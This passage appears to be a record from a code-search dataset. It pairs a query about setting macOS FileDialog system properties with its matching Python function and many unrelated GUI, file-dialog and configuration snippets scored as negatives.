preferenceNode['ScriptEditorFont'].setValue(font)\n preferenceNode['ScriptEditorFontSize'].setValue(12.0)\n preferenceNode['kwdsFgColour'].setValue(2629566719L)\n preferenceNode['stringLiteralsFgColourDQ'].setValue(10354943)\n preferenceNode['stringLiteralsFgColourSQ'].setValue(10354943)\n preferenceNode['commentsFgColour'].setValue(2442236415L)", "def initialize_options(self):", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def export_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._export_path_var.set(filename)", "def test_path(self):\n options = ControlOptions()\n options.parseOptions([b\"--data-path\", b\"/var/xxx\"])\n self.assertEqual(options[\"data-path\"], FilePath(b\"/var/xxx\"))", "def __init__(self, parent, controller, nextFrame = None, prevFrame = None, message = None):\n\n\t\t# Create a main frame\n\t\tFrame.__init__(self, parent, width = 1000)\n\t\tself.parent = parent\t\t# Window for interface\n\t\tself.controller = controller\n\t\tself.filePath = \"\"\t\t\t# Final file path\n\t\tself.filePathEntry = None\t# File path in browse entry\n\t\tself.continued = False\n\t\tself.nextFrame = nextFrame\n\t\tself.prevFrame = prevFrame\n\t\tself.message = message\n\t\t# Create GUI\n\t\tself.initGUI()", "def preferences(self):\n from dialogs import preferencesDialog\n prefs=preferencesDialog.Create(self,-1,'')\n prefs.ShowModal()", "def browse( self ):\n Tk.Tk().withdraw()\n filename = askopenfilename( initialdir = self.initialdir,\n title = self.title ,\n filetypes = self.filetypes )\n\n if filename == \"\":\n return\n\n self.set_text( filename )\n #rint( f\"get_text = {self.get_text()}\", flush = True )", "def __gitConfigure(self):\n e5App().getObject(\"UserInterface\").showPreferences(\"zzz_gitPage\")", "def _startup_system(self):\n\n self._config_path.set(filedialog.asksaveasfilename())\n self._system = System(self._config_path.get())\n\n self._start_frame.pack_forget()\n self._main_frame.pack()", "def __init__(self, dat_details: dict[str, dict[str, str]], config: Config, parent: Any = None) -> None:\r\n\r\n super(SettingsWindow, self).__init__(parent)\r\n self.ui = Ui_Settings()\r\n self.ui.setupUi(self)\r\n\r\n # Hide the error label\r\n self.ui.labelURLError.hide()\r\n\r\n # The folder location labels don't want to render with promoted subclasses (likely\r\n # the parent is wrong), so we have to do it manually\r\n self.ui.labelCloneListsLocation.hide()\r\n self.ui.labelCloneListsLocation.deleteLater()\r\n self.ui.labelCloneListsLocation = ElisionLabel('', mode=qtc.Qt.ElideLeft, parent=self.ui.frameCloneListsLocation) # type: ignore\r\n self.ui.labelCloneListsLocation.setText(qtc.QCoreApplication.translate('Settings', u'No clone list folder selected', None)) # type: ignore\r\n self.ui.labelCloneListsLocation.setObjectName(u'labelCloneListsLocation')\r\n self.ui.labelCloneListsLocation.setGeometry(qtc.QRect(50, 20, 531, 20))\r\n self.ui.labelCloneListsLocation.setStyleSheet('color: #777')\r\n\r\n self.ui.labelMetadataLocation.hide()\r\n self.ui.labelMetadataLocation.deleteLater()\r\n self.ui.labelMetadataLocation = ElisionLabel('', mode=qtc.Qt.ElideLeft, parent=self.ui.frameMetadataLocation) # type: ignore\r\n self.ui.labelMetadataLocation.setText(qtc.QCoreApplication.translate('Settings', u'No metadata folder selected', None)) # type: ignore\r\n self.ui.labelMetadataLocation.setObjectName(u'labelMetadataLocation')\r\n self.ui.labelMetadataLocation.setGeometry(qtc.QRect(50, 20, 531, 20))\r\n self.ui.labelMetadataLocation.setStyleSheet('color: #777')\r\n\r\n # Fix the fonts\r\n set_fonts(self)\r\n\r\n # Get the values from the user config\r\n self.ui.labelCloneListsLocation.setText(str(pathlib.Path(parent.clone_lists_folder).resolve()))\r\n self.ui.labelMetadataLocation.setText(str(pathlib.Path(parent.metadata_folder).resolve()))\r\n self.ui.lineEditCloneListDownloadLocation.setText(parent.clone_list_metadata_url)\r\n\r\n # Set up the interactions\r\n self.ui.buttonChooseCloneListsLocation.clicked.connect(lambda: set_path(parent, parent.clone_lists_folder, self.ui.labelCloneListsLocation, 'clone_lists_folder', input_type='folder'))\r\n self.ui.buttonChooseMetadataLocation.clicked.connect(lambda: set_path(parent, parent.metadata_folder, self.ui.labelMetadataLocation, 'metadata_folder', input_type='folder'))\r\n\r\n def url_entry(url: str) -> None:\r\n \"\"\" Validates a URL, writes to config accordingly.\r\n\r\n Args:\r\n - `url (str)` The URL to validate.\r\n \"\"\"\r\n if not url:\r\n parent.clone_list_metadata_url = config.clone_list_metadata_download_location\r\n return\r\n else:\r\n if validators.url(url):\r\n self.ui.labelURLError.hide()\r\n parent.clone_list_metadata_url = url\r\n write_config(parent, dat_details, config, self)\r\n else:\r\n self.ui.labelURLError.show()\r\n\r\n self.ui.lineEditCloneListDownloadLocation.keyPressed.connect(lambda: url_entry(self.ui.lineEditCloneListDownloadLocation.text()))\r\n\r\n # Set up config writing\r\n self.ui.buttonChooseCloneListsLocation.clicked.connect(lambda: write_config(parent, dat_details, config, self))\r\n self.ui.buttonChooseMetadataLocation.clicked.connect(lambda: write_config(parent, dat_details, config, self))\r\n\r\n def reset_config() -> None:\r\n \"\"\" Resets the settings window when the reset button is clicked. \"\"\"\r\n self.ui.labelCloneListsLocation.setText(str(pathlib.Path(config.path_clone_list).resolve()))\r\n self.ui.labelMetadataLocation.setText(str(pathlib.Path(config.path_metadata).resolve()))\r\n self.ui.lineEditCloneListDownloadLocation.setText(config.clone_list_metadata_download_location)\r\n parent.clone_lists_folder = config.path_clone_list\r\n parent.metadata_folder = config.path_metadata\r\n parent.clone_list_metadata_url = config.clone_list_metadata_download_location\r\n write_config(parent, dat_details, config, self)\r\n\r\n self.ui.pushButtonReset.clicked.connect(lambda: reset_config())", "def common_set_options(opt):\n opt.tool_options('compiler_cxx')\n opt.tool_options('compiler_cc')\n opt.tool_options('python')\n \n opt.add_option('--wxpython', action='store_true', default=False, help='Create the wxPython bindings.')\n opt.add_option('--wx-compiler-prefix', action='store', default='vc',\n help='Specify a different compiler prefix (do this if you used COMPILER_PREFIX when building wx itself)')\n opt.add_option('--macosx-version', action='store', default='', help=\"Version of OS X to build for.\")", "def svn_client_copy_source_t_path_set(svn_client_copy_source_t_self, char_path): # real signature unknown; restored from __doc__\n pass", "def persist_macos(self) -> None:", "def invoke (self, context, event):\n context.window_manager.fileselect_add (self)\n return {'RUNNING_MODAL'}", "def FileOpenDialog( message, wildcard, style=0, defaultDir=os.getcwd(), defaultFile='' ):\n style = style | wx.OPEN | wx.CHANGE_DIR\n return FileDialog( message, wildcard, style, defaultDir, defaultFile )", "def carpeta(self):\r\n #Crea el diálogo para seleccionar carpeta\r\n carpeta = (QtWidgets.\r\n QFileDialog.\r\n getExistingDirectory(None, 'Seleccionar Carpeta',\r\n self.cwd, \r\n QtWidgets.QFileDialog.ShowDirsOnly))\r\n #Borra los nombres de archivos que se están mostrando en la lista\r\n self.listWidget.clear()\r\n \r\n #Evalúa si seleccionó una carpeta\r\n if len(carpeta) > 1:\r\n #Lista de los archivos en la carpeta seleccionada\r\n listArchivos = os.listdir(carpeta)\r\n for i in listArchivos:\r\n self.listWidget.addItem(i)", "def QuickClient():\n window = Toplevel(root)\n window.title(\"Connection options\")\n window.grab_set()\n Label(window, text=\"Server IP:\").grid(row=0)\n destination = Entry(window)\n destination.grid(row=0, column=1)\n go = Button(window, text=\"Connect\", command=lambda:\n client_options_go(destination.get(), \"9999\", window))\n go.grid(row=1, column=1)", "def updateStorageOptionComboBox(self, row, filePath):\n assert threading.current_thread().name == \"MainThread\"\n with Tracer(traceLogger):\n # Determine the relative path to this file\n absPath, relPath = getPathVariants(filePath, self.topLevelOperator.WorkingDirectory.value)\n # Add a prefixes to make the options clear\n absPath = \"Absolute Link: \" + absPath\n relPath = \"Relative Link: <project directory>/\" + relPath\n\n combo = QComboBox()\n options = {} # combo data -> combo text\n options[ LocationOptions.AbsolutePath ] = absPath\n options[ LocationOptions.RelativePath ] = relPath\n\n options[ LocationOptions.Project ] = \"Store in Project File\"\n\n for option, text in sorted(options.items()):\n # Add to the combo, storing the option as the item data\n combo.addItem(text, option)\n\n # Select the combo index that matches the current setting\n location = self.topLevelOperator.Dataset[row].value.location\n\n if location == DatasetInfo.Location.ProjectInternal:\n comboData = LocationOptions.Project\n elif location == DatasetInfo.Location.FileSystem:\n # Determine if the path is relative or absolute\n if os.path.isabs(self.topLevelOperator.Dataset[row].value.filePath[0]):\n comboData = LocationOptions.AbsolutePath\n else:\n comboData = LocationOptions.RelativePath\n\n comboIndex = combo.findData( QVariant(comboData) )\n combo.setCurrentIndex( comboIndex )\n\n combo.currentIndexChanged.connect( partial(self.handleComboSelectionChanged, combo) )\n self.fileInfoTableWidget.setCellWidget( row, Column.Location, combo )", "def _restore_options(self):\r\n fn = self._opt_file_name()\r\n if os.path.exists(fn):\r\n try:\r\n opt = pickle.load(open(fn, \"r\"))\r\n self.tb_pragma.SetValue(opt[\"topic\"])\r\n self.tb_package.SetValue(opt[\"package\"])\r\n self.tb_file_header.SetValue(opt[\"header\"])\r\n self.tb_target_folder.SetValue(opt[\"target_folder\"])\r\n self.tb_encoding.SetValue(opt[\"encoding\"])\r\n except Exception as ex:\r\n print(\"Error durring restore default options\")\r\n print(ex)", "def __init__(self, parent, app_path):\r\n self.app_path = app_path\r\n self.ssid = tkinter.StringVar()\r\n self.connection_mode = tkinter.StringVar()\r\n self.authentication = tkinter.StringVar()\r\n self.encryption = tkinter.StringVar()\r\n self.password = tkinter.StringVar()\r\n self.profile_data = []\r\n # calling constructor of base class.\r\n BasicDialog.__init__(self, parent, title=None)", "def _get_file(self, event):\n dlg = wx.FileDialog(None, \"Select a file\", \n wildcard=\"Password Files (*.*)|*.*\",\n defaultDir=os.getcwd(), \n style=wx.FD_SAVE)\n \n if dlg.ShowModal() == wx.ID_OK:\n newpath = dlg.GetPaths()[0]\n self.dbFile.Value = newpath\n \n dlg.Destroy()", "def configure(options):\n configuring = Configuring()\n configuring.run()\n config = configuring.config\n\n # Install the right dependencies\n print_to_terminal(\"Installing extra dependencies (webkit, gth and simplejson)\")\n to_install_packages = ['python-webkit', 'python-gtk2', 'python-simplejson']\n subprocess.call(['sudo', 'apt-get', 'install']+to_install_packages)\n\n # Create fancy desktop entry\n for file in ['viki.desktop', 'viki_env.sh', 'viki_launch.sh']:\n process_template(file, config)\n os.chmod(file, os.stat(file).st_mode | stat.S_IEXEC)\n app_dir = os.path.expanduser('~/.local/share/applications')\n command = \"desktop-file-install --dir={} {}/viki.desktop\".format(app_dir, os.getcwd())\n subprocess.call(command, shell=True)\n return None", "def client_settings():\n return CLIENT_SETTINGS", "def set(self):\n \n ffmpeg_installed = misc.askquestion(DialogTitle='FFMPEG Check',\n Question='Is FFMPEG installed?')\n \n if ffmpeg_installed:\n ffmpeg_dir = misc.get_dir(DialogTitle='Please select the directory where FFMPEG (binary) is installed:')\n \n if sys.platform=='win32':\n self.ffmpeg = os.path.join(ffmpeg_dir, 'ffmpeg.exe')\n self.ffplay = os.path.join(ffmpeg_dir, 'ffplay.exe')\n else:\n self.ffmpeg = os.path.join(ffmpeg_dir, 'ffmpeg')\n self.ffplay = os.path.join(ffmpeg_dir, 'ffplay')\n \n if not os.path.exists(self.ffmpeg):\n print('Sorry, {0} does not exist!'.format(self.ffmpeg))\n return\n \n if not os.path.exists(self.ffplay):\n print('Sorry, {0} does not exist!'.format(self.ffplay))\n return\n \n else:\n self.ffmpeg = None\n self.ffplay = None\n \n # Save them to the default config file\n info = {'ffmpeg':self.ffmpeg, 'ffplay': self.ffplay}\n try:\n with open(self.config_file, 'w') as outFile:\n json.dump(info, outFile)\n print('Config information written to {0}'.format(os.path.abspath(self.config_file)))\n except PermissionError as e:\n curDir = os.path.abspath(os.curdir)\n print('Current directory: {0}'.format(curDir))\n print('Error: {0}'.format(e))\n \n return", "def UpdateDisplay(self):\n ##Jconf\n self.chJconf.Clear()\n for name in self.state.GetSurface(\"JconfDict\").GetNames():\n self.chJconf.Append(name)\n self.chJconf.SetStringSelection(self.state.GetSurface(\"JconfSelection\"))\n self.chJconf.Enable(self.state.IsEnabled(\"JconfDict\") == True and\n self.state.IsEnabled(\"JconfSelection\") == True and\n self.state.GetSurface(\"Xplorer\") == True)\n self.bEditJconf.Enable(self.state.IsEnabled(\"JconfDict\") and\n self.state.GetSurface(\"Xplorer\") == True)\n ##Name Server\n self.cbNameServer.SetValue(self.state.GetSurface(\"NameServer\"))\n self.cbNameServer.Enable(self.state.IsEnabled(\"NameServer\"))\n ##Conductor\n self.cbConductor.SetValue(self.state.GetSurface(\"Conductor\"))\n self.cbConductor.Enable(self.state.IsEnabled(\"Conductor\"))\n ##Xplorer\n self.cbXplorer.SetValue(self.state.GetSurface(\"Xplorer\"))\n self.cbXplorer.Enable(self.state.IsEnabled(\"Xplorer\"))\n ##Desktop Mode\n self.cbDesktop.SetValue(self.state.GetSurface(\"DesktopMode\"))\n self.cbDesktop.Enable(self.state.IsEnabled(\"DesktopMode\"))\n ##Xplorer Type\n if self.state.GetSurface(\"DesktopMode\"):\n self.rbXplorer.SetSelection(0)\n else:\n if (self.state.GetSurface(\"XplorerType\") == \"OSG-VEP\"):\n self.rbXplorer.SetSelection(0)\n else:\n self.rbXplorer.SetSelection(1)\n self.rbXplorer.Enable(self.state.IsEnabled(\"XplorerType\") == True and\n self.state.GetSurface(\"DesktopMode\") == False and\n self.state.GetSurface(\"Xplorer\") == True)\n ##Cluster Node button\n self.bCluster.Enable(CLUSTER_ENABLED and\n self.state.GetSurface(\"Xplorer\") == True and\n self.state.GetSurface(\"DesktopMode\") == False and\n self.state.GetSurface(\"XplorerType\") == \"OSG-VEPC\")\n return", "def __init__(self, source, parent=None, move=False, force=False):\n super(SvnCopyDialog, self).__init__(parent)\n self.setupUi(self)\n \n self.source = source\n if os.path.isdir(self.source):\n self.targetPicker.setMode(E5PathPickerModes.DirectoryMode)\n else:\n self.targetPicker.setMode(E5PathPickerModes.SaveFileMode)\n \n if move:\n self.setWindowTitle(self.tr('Subversion Move'))\n else:\n self.forceCheckBox.setEnabled(False)\n self.forceCheckBox.setChecked(force)\n \n self.sourceEdit.setText(source)\n \n self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(False)\n \n msh = self.minimumSizeHint()\n self.resize(max(self.width(), msh.width()), msh.height())", "def accept(self):\n acceptSelection = self.acceptCombo.currentIndex()\n if acceptSelection == 0:\n acceptPolicy = CookieJar.AcceptAlways\n elif acceptSelection == 1:\n acceptPolicy = CookieJar.AcceptNever\n elif acceptSelection == 2:\n acceptPolicy = CookieJar.AcceptOnlyFromSitesNavigatedTo\n \n keepSelection = self.keepUntilCombo.currentIndex()\n if keepSelection == 0:\n keepPolicy = CookieJar.KeepUntilExpire\n elif keepSelection == 1:\n keepPolicy = CookieJar.KeepUntilExit\n \n jar = self.__mw.cookieJar()\n jar.setAcceptPolicy(acceptPolicy)\n jar.setKeepPolicy(keepPolicy)\n jar.setFilterTrackingCookies(\n self.filterTrackingCookiesCheckbox.isChecked())\n \n super(CookiesConfigurationDialog, self).accept()", "def choosefile():\r\n\r\n # get filename\r\n filename = tkFileDialog.askopenfilename(**options)\r\n #print filename, '*****'\r\n\r\n # open file on your own\r\n if filename:\r\n #return open(filename, 'r')\r\n tasks.upload_chosen = filename", "def setfilepaths():\n\n if gethostname() in ['stable', 'challenger', 'p', 'fog']:\n ncDir = '/home/disk/eos9/woelfle/cesm/nobackup/cesm1to2/'\n ncSubDir = '0.9x1.25/'\n saveDir = ('/home/disk/user_www/woelfle/cesm1to2/')\n\n elif gethostname() == 'woelfle-laptop':\n ncDir = 'C:\\\\Users\\\\woelfle\\\\Documents\\\\UW\\\\CESM\\\\hist\\\\'\n ncSubDir = ''\n saveDir = 'C:\\\\Users\\\\woelfle\\\\Documents\\\\UW\\\\CESM\\\\figs\\\\'\n\n elif gethostname()[0:6] in ['yslogi', 'geyser']:\n ncDir = '/glade/p/cgd/amp/people/hannay/amwg/climo/'\n ncSubDir = '0.9x1.25/'\n saveDir = '/glade/p/work/woelfle/figs/cesm1to2/'\n\n return (ncDir, ncSubDir, saveDir)", "def options_set(self):\n\n global OPTIONS\n OPTIONS.append(config.ENABLE(self.threaded))\n OPTIONS.append(config.ENABLE(self.datasaver))\n OPTIONS.append(self.language)", "def __init__(self, controller):\n matplotlib.use('TkAgg')\n self.version = \"1.4 20170920 (tk)\"\n self.controller = controller # previously referred as 'parent'\n self.tk_root = tk.Tk()\n self.tk_root.title(\"supersid @ \" + self.controller.config['site_name'])\n\n # All Menus creation\n menubar = tk.Menu(self.tk_root)\n filemenu = tk.Menu(menubar, tearoff=0)\n filemenu.add_command(label=\"Save Raw buffers\", command=lambda: self.save_file('r'),underline=5,accelerator=\"Ctrl+R\")\n filemenu.add_command(label=\"Save Filtered buffers\", command=lambda: self.save_file('f'),underline=5,accelerator=\"Ctrl+F\")\n filemenu.add_command(label=\"Save Extended raw buffers\", command=lambda: self.save_file('e'),underline=5,accelerator=\"Ctrl+E\")\n filemenu.add_command(label=\"Save filtered as ...\", command=lambda: self.save_file('s'),underline=5,accelerator=\"Ctrl+S\")\n filemenu.add_separator()\n filemenu.add_command(label=\"Exit\", command=lambda : self.close(force_close=False)) # ,underline=1,accelerator=\"Ctrl+X\")\n self.tk_root.bind_all(\"<Control-r>\", self.save_file)\n self.tk_root.bind_all(\"<Control-f>\", self.save_file)\n self.tk_root.bind_all(\"<Control-e>\", self.save_file)\n self.tk_root.bind_all(\"<Control-s>\", self.save_file)\n self.tk_root.protocol(\"WM_DELETE_WINDOW\", lambda : self.close(False)) # user click on the [X] to close the window\n menubar.add_cascade(label=\"File\", menu=filemenu)\n\n helpmenu = tk.Menu(menubar, tearoff=0)\n helpmenu.add_command(label=\"About...\", command=self.on_about)\n menubar.add_cascade(label=\"Help\", menu=helpmenu)\n\n self.tk_root.config(menu=menubar)\n\n # FigureCanvas\n self.psd_figure = Figure(facecolor='beige')\n self.canvas = FigureCanvas(self.psd_figure, master=self.tk_root)\n self.canvas.draw()\n self.canvas.get_tk_widget().pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n self.toolbar = NavigationToolbar2Tk( self.canvas, self.tk_root)\n self.toolbar.update()\n self.canvas._tkcanvas.pack(side=tk.TOP, fill=tk.BOTH, expand=1)\n\n self.axes = self.psd_figure.add_subplot(111)\n #self.axes.hold(False)\n\n # StatusBar\n self.statusbar_txt = tk.StringVar()\n self.label=tk.Label(self.tk_root, bd=1, relief=tk.SUNKEN, anchor=tk.W,\n textvariable=self.statusbar_txt,\n font=('arial',12,'normal'))\n self.statusbar_txt.set('Initialization...')\n self.label.pack(fill=tk.X)", "def _options(self):\r\n xmi_file = self.tb_xmi_file_name.GetValue()\r\n topic = self.tb_pragma.GetValue()\r\n package = self.tb_package.GetValue()\r\n header = self.tb_file_header.GetValue()\r\n target_folder = self.tb_target_folder.GetValue()\r\n encoding = self.tb_encoding.GetValue()\r\n \r\n return {\"topic\" : topic, \r\n \"package\" : package, \r\n \"header\" : header, \r\n \"target_folder\" : target_folder,\r\n \"encoding\" : encoding,\r\n \"xmi_file\" : xmi_file}", "def script_properties():\n props = obs.obs_properties_create()\n p = obs.obs_properties_add_list(props, \"source\", \"Text Source\",\n obs.OBS_COMBO_TYPE_EDITABLE,\n obs.OBS_COMBO_FORMAT_STRING)\n sources = obs.obs_enum_sources()\n if sources is not None:\n for source in sources:\n source_id = obs.obs_source_get_id(source)\n if source_id == \"text_gdiplus\" or source_id == \"text_ft2_source\":\n name = obs.obs_source_get_name(source)\n obs.obs_property_list_add_string(p, name, name)\n\n obs.source_list_release(sources)\n\n obs.obs_properties_add_button(props, \"button\", \"Start Overlay\", start_overlay)\n obs.obs_properties_add_button(props, \"button2\", \"Stop Overlay\", stop_overlay)\n\n return props", "def set_defaults(self):\n if self.main_win.working_dir is None or self.main_win.id is None or \\\n len(self.main_win.working_dir) == 0 or len(self.main_win.id) == 0:\n msg_window('Working Directory or Reconstruction ID not configured')\n else:\n self.reconstructions.setText('1')\n self.device.setText('(0,1)')\n self.alg_seq.setText('((3,(\"ER\",20),(\"HIO\",180)),(1,(\"ER\",20)))')\n self.beta.setText('.9')\n self.support_area.setText('(0.5, 0.5, 0.5)')\n self.cont.setChecked(False)", "def onSave(self):\r\n # productive #onButton\r\n profprint()\r\n\r\n self.dirDialog = qt.QFileDialog(self.parent)\r\n self.dirDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\", \"Config\"))\r\n self.dirDialog.options = self.dirDialog.DontUseNativeDialog\r\n self.dirDialog.acceptMode = self.dirDialog.AcceptSave\r\n self.dirDialog.defaultSuffix = \"cfg\"\r\n self.dirDialog.setNameFilter(\"Configuration file (*.cfg)\")\r\n self.dirDialog.connect(\"fileSelected(QString)\", self.saveFileSelected)\r\n self.dirDialog.show()", "def browse_files_out(self,*args):\n path_to_data = tkFileDialog.askopenfilename()\n #show chosen value in textframe\n self.docstring_offers.delete(0,tk.END)\n self.docstring_offers.insert(0,path_to_data)\n #use chosen value as self.exchanged_offers_filepa\n self.exchanged_offers_filepath.set(path_to_data)", "def _get_file(self, event):\n dlg = wx.FileDialog(None, \"Select a file\", \n wildcard=\"Password Files (*.*)|*.*\",\n defaultDir=os.getcwd(), \n style=wx.FD_OPEN|wx.FD_FILE_MUST_EXIST)\n \n if dlg.ShowModal() == wx.ID_OK:\n newpath = dlg.GetPaths()[0]\n self.dbFile.Value = newpath\n self._save_state()\n \n dlg.Destroy()", "def _create_default_config(self):\n self.options.setdefault('options.admin_passwd', '')\n sys.path.append(self.openerp_dir)\n sys.path.extend([egg.location for egg in self.ws])\n from openerp.tools.config import configmanager\n configmanager(self.config_path).save()", "def AddGeneralGClientProperties(factory_properties):\n # Make sure that pulled in projects have the right revision based on date.\n factory_properties['gclient_transitive'] = True\n # Don't set branch part on the --revision flag - we don't use standard\n # chromium layout and hence this is doing the wrong thing.\n factory_properties['no_gclient_branch'] = True", "def test_default(self):\r\n self.assertEqual(self.option.default, '/tmp')" ]
[ "0.59659076", "0.52273905", "0.52243555", "0.5196339", "0.51798254", "0.51786554", "0.51282394", "0.5127446", "0.51222116", "0.51085234", "0.5083295", "0.50667393", "0.5033301", "0.5033301", "0.5033301", "0.5008447", "0.5006361", "0.4993501", "0.49912578", "0.49555835", "0.49392104", "0.49265411", "0.49237505", "0.49206007", "0.49100357", "0.48970252", "0.48811245", "0.48734605", "0.4852869", "0.4848985", "0.4842083", "0.48382214", "0.48151556", "0.4811101", "0.48058578", "0.47975108", "0.47974765", "0.47714505", "0.47614014", "0.47489163", "0.47414377", "0.47405484", "0.47257885", "0.47219405", "0.47174987", "0.47070086", "0.4706983", "0.4705095", "0.4696061", "0.46888623", "0.46863505", "0.4683354", "0.46734032", "0.46635628", "0.46620125", "0.46620125", "0.4652894", "0.46454036", "0.46449995", "0.4642293", "0.4642293", "0.4642293", "0.4642293", "0.46374214", "0.46372226", "0.46341464", "0.4634017", "0.4633058", "0.46303576", "0.46300155", "0.4629459", "0.46286058", "0.4620312", "0.4613696", "0.45993903", "0.45948443", "0.45938003", "0.4591018", "0.45817998", "0.45745134", "0.45735717", "0.45734978", "0.45692542", "0.45668367", "0.45600918", "0.4554547", "0.45528924", "0.45454097", "0.45368454", "0.45345247", "0.4531826", "0.45277214", "0.45274943", "0.45229498", "0.45228368", "0.45186335", "0.4515871", "0.4514041", "0.45078716", "0.45039243" ]
0.60916245
0
sets up System Properties for FileDialog() to behave as required >> Mac only
def setFileDialogParameters(lReportOnly=False, lDefaults=False, lSelectDirectories=None, lPackagesT=None): myPrint("D", "In ", inspect.currentframe().f_code.co_name, "()") if not Platform.isOSX(): return _TRUE = "true" _FALSE = "false" _DIRS_FD = "apple.awt.fileDialogForDirectories" # When True you can select a Folder (rather than a file) _PKGS_FD = "apple.awt.use-file-dialog-packages" # When True allows you to select a 'bundle' as a file; False means navigate inside the bundle # "com.apple.macos.use-file-dialog-packages" # DEPRECATED since Monterrey - discovered this about MD2022.5(4090) - refer: java.desktop/sun/lwawt/macosx/CFileDialog.java # FileDialog defaults # "apple.awt.fileDialogForDirectories" default "false" >> set "true" to allow Directories to be selected # "apple.awt.use-file-dialog-packages" default "true" >> set "false" to allow access to Mac 'packages' if debug or lReportOnly: myPrint("B", "Parameters set: ReportOnly: %s, Defaults:%s, SelectDirectories:%s, PackagesT:%s" % (lReportOnly, lDefaults, lSelectDirectories, lPackagesT)) txt = ("Before setting" if not lReportOnly else "Reporting only") for setting in [_DIRS_FD, _PKGS_FD]: myPrint("DB", "%s: '%s': '%s'" %(pad(txt,14), pad(setting,50), System.getProperty(setting))) if lReportOnly: return if lDefaults: System.setProperty(_DIRS_FD,_FALSE) System.setProperty(_PKGS_FD,_TRUE) else: if lSelectDirectories is not None: System.setProperty(_DIRS_FD, (_TRUE if lSelectDirectories else _FALSE)) if lPackagesT is not None: System.setProperty(_PKGS_FD, (_TRUE if lPackagesT else _FALSE)) for setting in [_DIRS_FD, _PKGS_FD]: myPrint("DB", "After setting: '%s': '%s'" %(pad(setting,50), System.getProperty(setting))) return
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def _startup_system(self):\n\n self._config_path.set(filedialog.asksaveasfilename())\n self._system = System(self._config_path.get())\n\n self._start_frame.pack_forget()\n self._main_frame.pack()", "def pkg_app_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._pkg_app_path_var.set(filename)", "def persist_macos(self) -> None:", "def user_safety_config():\n\n\tprint_section_header(\"USER SAFETY\", Fore.BLUE)\n\n\tif prompt_yes_no(top_line=\"-> Lock Mac as soon as screen saver starts?\",\n\t bottom_line=\"If your screen is black or on screensaver mode, you'll be prompted for a password to login every time.\"):\n\t\tprint_confirmation(\"Configuring account lock on screensaver...\")\n\t\tsp.run(['defaults', 'write', 'com.apple.screensaver', 'askForPassword', '-int', '1'], stdout=sp.PIPE)\n\t\tsp.run(['defaults', 'write', 'com.apple.screensaver', 'askForPasswordDelay', '-int', '0'], stdout=sp.PIPE)\n\n\tif prompt_yes_no(top_line=\"-> Display all file extensions?\",\n\t bottom_line=\"This prevents malware from disguising itself as another file type.\"):\n\t\tprint_confirmation(\"Configuring display of all file extensions...\")\n\t\tsp.run(['defaults', 'write', 'NSGlobalDomain', 'AppleShowAllExtensions', '-bool', 'true'], stdout=sp.PIPE)\n\n\tif prompt_yes_no(top_line=\"-> Disable saving to the cloud by default?\",\n\t bottom_line=\"This prevents sensitive documents from being unintentionally stored on the cloud.\"):\n\t\tprint_confirmation(\"Disabling cloud saving by default...\")\n\t\tsp.run(['defaults', 'write', 'NSGlobalDomain', 'NSDocumentSaveNewDocumentsToCloud', '-bool', 'false'], stdout=sp.PIPE)\n\n\tif prompt_yes_no(top_line=\"-> Show hidden files in Finder?\",\n\t bottom_line=\"This lets you see all files on the system without having to use the terminal.\"):\n\t\tprint_confirmation(\"Displaying hidden files in Finder...\")\n\t\tsp.run(['defaults', 'write', 'com.apple.finder', 'AppleShowAllFiles', '-boolean', 'true'], shell=True, stdout=sp.PIPE)\n\n\t# Reset finder after messing with it.\n\tprint_confirmation(\"Resetting Finder to finalize changes...\")\n\tsp.run(['killAll', 'Finder'], stdout=sp.PIPE)", "def fileDialog(*args, application: bool=True, defaultFileName: AnyStr=\"\", directoryMask:\n AnyStr=\"\", mode: int=0, title: AnyStr=\"\", **kwargs)->AnyStr:\n pass", "def set_spec_file(self):\n self.specfile = select_file(os.getcwd())\n if self.specfile is not None:\n self.spec_file_button.setStyleSheet(\"Text-align:left\")\n self.spec_file_button.setText(self.specfile)\n else:\n self.specfile = None\n self.spec_file_button.setText('')\n if self.is_exp_exists() or self.is_exp_set():\n self.set_experiment()", "def input_file_chooser(self):\n filename = tk.filedialog.askopenfilename()\n self._input_path_var.set(filename)", "def __init__(\n self,\n title:str=\"Universal File Dialog\",\n icon:str=\"\",\n show_hidden:bool=False,\n include_files:bool=True,\n multiselect:bool=True,\n select_dirs:bool=True,\n select_files:bool=True,\n unix_delimiter:bool=True,\n stdout:bool=False\n ):\n\n if not isinstance(title, str):\n raise TypeError(\"Argument title must be type string.\")\n\n self.title = title\n\n if icon:\n if not isinstance(icon, str):\n raise TypeError(\"Argument icon must be type string.\")\n\n if not isfile(icon):\n raise FileNotFoundError(f\"File not found: {icon}\")\n\n self.icon = icon\n\n else: \n self.icon = \"\"\n\n if show_hidden:\n self.show_hidden = True\n else:\n self.show_hidden = False\n\n if include_files:\n self.include_files = True\n else:\n self.include_files = False\n\n if multiselect:\n self.multiselect = True\n else:\n self.multiselect = False\n\n if select_dirs:\n self.select_dirs = True\n else:\n self.select_dirs = False\n\n if select_files:\n self.select_files = True\n else:\n self.select_files = False\n\n if unix_delimiter:\n self.unix_delimiter = True\n else:\n self.unix_delimiter = False\n\n if stdout:\n self.stdout = True\n else:\n self.stdout = False\n\n # Tkinter:\n self.dialog = Tk()\n self.dialog.withdraw()\n self.dialog.title(self.title)\n self.dialog.minsize(width=300, height=200)\n self.dialog.geometry(\"500x300\")\n self.dialog.update_idletasks()\n\n self.file_icon=PhotoImage(\n file=f\"{dirname(__file__)}/file.gif\",\n master=self.dialog\n ).subsample(50)\n\n self.folder_icon=PhotoImage(\n file=f\"{dirname(__file__)}/folder.gif\",\n master=self.dialog\n ).subsample(15)\n \n self.disk_icon=PhotoImage(\n file=f\"{dirname(__file__)}/disk.gif\",\n master=self.dialog\n ).subsample(15)\n\n if self.icon:\n self.dialog.iconbitmap(self.icon)\n else:\n self.dialog.iconbitmap(f\"{dirname(__file__)}/icon.ico\")\n \n # 